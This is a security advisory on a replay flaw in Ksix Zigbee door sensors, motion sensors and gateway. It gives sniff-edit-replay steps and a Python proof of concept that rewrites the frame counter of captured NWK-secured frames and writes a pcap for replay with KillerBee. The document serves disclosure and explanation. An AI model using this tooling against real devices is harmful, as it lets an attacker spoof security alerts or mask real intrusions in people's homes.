Ksix Zigbee Devices Replay Attack Vulnerability
Vulnerability
A replay attack vulnerability exists in Ksix Zigbee smart home devices, including the Zigbee Gateway Module (v1.0.3), Door Sensor (v1.0.7) and Motion Sensor (v1.0.12). The affected devices implement Zigbee's anti-replay mechanism incorrectly. That mechanism relies on the per-source frame counter carried in the NWK security header: a receiver is supposed to discard any frame whose counter is not higher than the last one it accepted from that source, and because the counter is also part of the CCM* nonce that protects the frame, a counter that has been altered on an otherwise unchanged frame should also fail the integrity check (MIC). On the affected devices, an attacker within radio range can capture a legitimate message and replay it with a higher frame counter; the device accepts it as authentic, so the attacker bypasses authentication and can trigger false alerts in the companion mobile application.
Impact
Exploitation of this vulnerability bypasses message authentication, so an attacker can inject spoofed messages into the Zigbee network. The result is false notifications in the mobile application that simulate real activity, such as a door being opened or motion being detected. The replayed traffic can also disrupt normal device communication: a sensor may appear online in the application while it is in fact unresponsive, which can delay the response to a real physical security breach.
Reproduction
To reproduce this vulnerability, capture Zigbee traffic with a compatible sniffer such as an APImote or a TI CC2531 and save it as a .pcap file. Open the file in Wireshark and identify a frame that triggers a response on the device side, for example a 'door open' alert. Raise that frame's frame counter to a value above the last one the receiver has accepted, write the edited frame back to a .pcap file, and replay it into the Zigbee network with a tool such as KillerBee. The device accepts the replayed message as legitimate and the corresponding alert appears in the mobile application.
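The procedure above, carried out on a constructed frame, as an added example that is not part of the original advisory and not code from Ksix or KillerBee. It uses only the Python standard library: it parses the 802.15.4 and Zigbee NWK headers of a NWK-secured frame, rewrites the 32-bit frame counter, reads and writes the pcap container, and models the receiver-side check. The sample frame, its addresses, payload and MIC bytes are constructed placeholders, and the layout assumes a short-addressed data frame with PAN ID compression and an extended-nonce NWK security header (the common Zigbee data frame shape); other frame shapes are rejected rather than mis-parsed. The receiver model deliberately checks the counter and nothing else, which is why it lets the altered copy through: a correct stack would also verify the MIC under a nonce that includes the counter.

```python
import struct

# Layout of a short-addressed IEEE 802.15.4 data frame carrying a NWK-secured Zigbee frame.
MAC_HDR_LEN = 9                          # FCF(2) seq(1) dst PAN(2) dst short(2) src short(2)
NWK_HDR_LEN = 8                          # FCF(2) dst(2) src(2) radius(1) seq(1)
AUX_HDR_OFF = MAC_HDR_LEN + NWK_HDR_LEN  # NWK auxiliary security header
FC_OFF = AUX_HDR_OFF + 1                 # 32-bit frame counter follows the security control byte
EXT_SRC_OFF = FC_OFF + 4                 # 64-bit source address (extended nonce present)
PAYLOAD_OFF = EXT_SRC_OFF + 8 + 1        # ciphertext starts after the key sequence number

# Constructed sample frame (not a capture from the Ksix devices): sensor 0x7b5a -> gateway 0x0000.
SAMPLE_FRAME = bytes.fromhex(
    "6188"              # MAC FCF 0x8861: data, ack request, PAN ID compression, 16-bit addresses
    "2a"                # MAC sequence number 42
    "3412"              # destination PAN 0x1234
    "0000" "5a7b"       # MAC destination 0x0000, source 0x7b5a
    "4802"              # NWK FCF 0x0248: data, protocol version 2, security enabled
    "0000" "5a7b"       # NWK destination 0x0000, source 0x7b5a
    "1e" "11"           # radius 30, NWK sequence number 17
    "28"                # security control: network key, extended nonce present
    "34120000"          # frame counter 0x00001234 (little-endian)
    "0102030405060708"  # extended source address (constructed)
    "00"                # key sequence number
    "a1b2c3d4e5f6"      # encrypted APS payload (opaque placeholder bytes)
    "deadbeef"          # 4-byte MIC (placeholder, not a valid CCM* tag)
)

PCAP_MAGIC = 0xA1B2C3D4
DLT_IEEE802_15_4_NOFCS = 230  # frames stored without FCS; the radio appends it on transmit


def parse_frame(frame: bytes) -> dict:
    """Extract the fields that matter for replay; raise on any shape this layout does not cover."""
    mac_fcf, mac_seq, _pan, _dst, _src = struct.unpack_from("<HBHHH", frame, 0)
    if mac_fcf & 0x7 != 0x1 or (mac_fcf >> 10) & 0x3 != 0x2 or (mac_fcf >> 14) & 0x3 != 0x2:
        raise ValueError("expected an 802.15.4 data frame with 16-bit addresses")
    nwk_fcf, nwk_dst, nwk_src, _radius, nwk_seq = struct.unpack_from("<HHHBB", frame, MAC_HDR_LEN)
    if not nwk_fcf & 0x0200:
        raise ValueError("NWK security bit clear: no frame counter to inspect")
    sec_ctl, frame_counter = struct.unpack_from("<BI", frame, AUX_HDR_OFF)
    if not sec_ctl & 0x20 or len(frame) < PAYLOAD_OFF + 4:
        raise ValueError("layout assumed here needs an extended nonce and a 4-byte MIC")
    ext_src = frame[EXT_SRC_OFF:EXT_SRC_OFF + 8][::-1].hex()  # addresses are little-endian on air
    return {"mac_seq": mac_seq, "nwk_src": nwk_src, "nwk_dst": nwk_dst, "nwk_seq": nwk_seq,
            "frame_counter": frame_counter, "ext_src": ext_src, "mic": frame[-4:].hex()}


def bump_frame_counter(frame: bytes, new_counter: int) -> bytes:
    """Rewrite only the NWK frame counter; headers, ciphertext and MIC are left as captured."""
    parse_frame(frame)  # validate the layout before patching bytes
    buf = bytearray(frame)
    struct.pack_into("<I", buf, FC_OFF, new_counter & 0xFFFFFFFF)
    return bytes(buf)


def write_pcap(frames) -> bytes:
    """Classic little-endian pcap: 24-byte global header, then 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, DLT_IEEE802_15_4_NOFCS)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f  # ts_sec, ts_usec, incl_len, orig_len
    return out


def read_pcap(data: bytes) -> list:
    if struct.unpack_from("<I", data, 0)[0] != PCAP_MAGIC:
        raise ValueError("unsupported pcap magic or byte order")
    off, frames = 24, []
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack_from("<IIII", data, off)
        frames.append(data[off + 16:off + 16 + incl])
        off += 16 + incl
    return frames


def secured_frames(frames):
    """Yield (frame, parsed fields) for NWK-secured data frames; skip ACKs, beacons and the rest."""
    for f in frames:
        try:
            yield f, parse_frame(f)
        except (ValueError, struct.error):
            continue


def forge_replay(capture: bytes, nwk_src: int, counter_step: int = 1) -> bytes:
    """Pick the last secured frame from nwk_src in a capture and emit a pcap with its counter raised."""
    candidates = [f for f, meta in secured_frames(read_pcap(capture)) if meta["nwk_src"] == nwk_src]
    if not candidates:
        raise LookupError("no secured frame from 0x%04x in capture" % nwk_src)
    original = candidates[-1]
    forged = bump_frame_counter(original, parse_frame(original)["frame_counter"] + counter_step)
    return write_pcap([forged])


class CounterOnlyReceiver:
    """Anti-replay modelled as a per-source counter comparison and nothing else (no MIC check)."""

    def __init__(self):
        self.last_seen = {}

    def accept(self, frame: bytes) -> bool:
        f = parse_frame(frame)
        if f["frame_counter"] <= self.last_seen.get(f["ext_src"], -1):
            return False  # verbatim replay: counter not higher than the last accepted one
        self.last_seen[f["ext_src"]] = f["frame_counter"]
        return True


if __name__ == "__main__":
    capture = write_pcap([SAMPLE_FRAME])
    forged = read_pcap(forge_replay(capture, 0x7B5A))[0]
    rx = CounterOnlyReceiver()
    print("original:", rx.accept(SAMPLE_FRAME), "verbatim replay:", rx.accept(SAMPLE_FRAME),
          "bumped replay:", rx.accept(forged))
```

The pcap produced by forge_replay is written with link type 230 (IEEE 802.15.4 without FCS), so the frame can be inspected in Wireshark and handed to a replay tool such as KillerBee's zbreplay; which link type and options that tool expects is an assumption to check against its documentation. The three results printed at the end are the point of the model: the capture is accepted once, the verbatim copy is rejected by the counter comparison, and the copy with a raised counter is accepted again because nothing ties the counter to the MIC. The CCM* nonce in Zigbee NWK security includes the frame counter, so a receiver that verifies the MIC would reject the altered frame; that verification is what this model, and by the advisory's description the affected devices, leave out.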
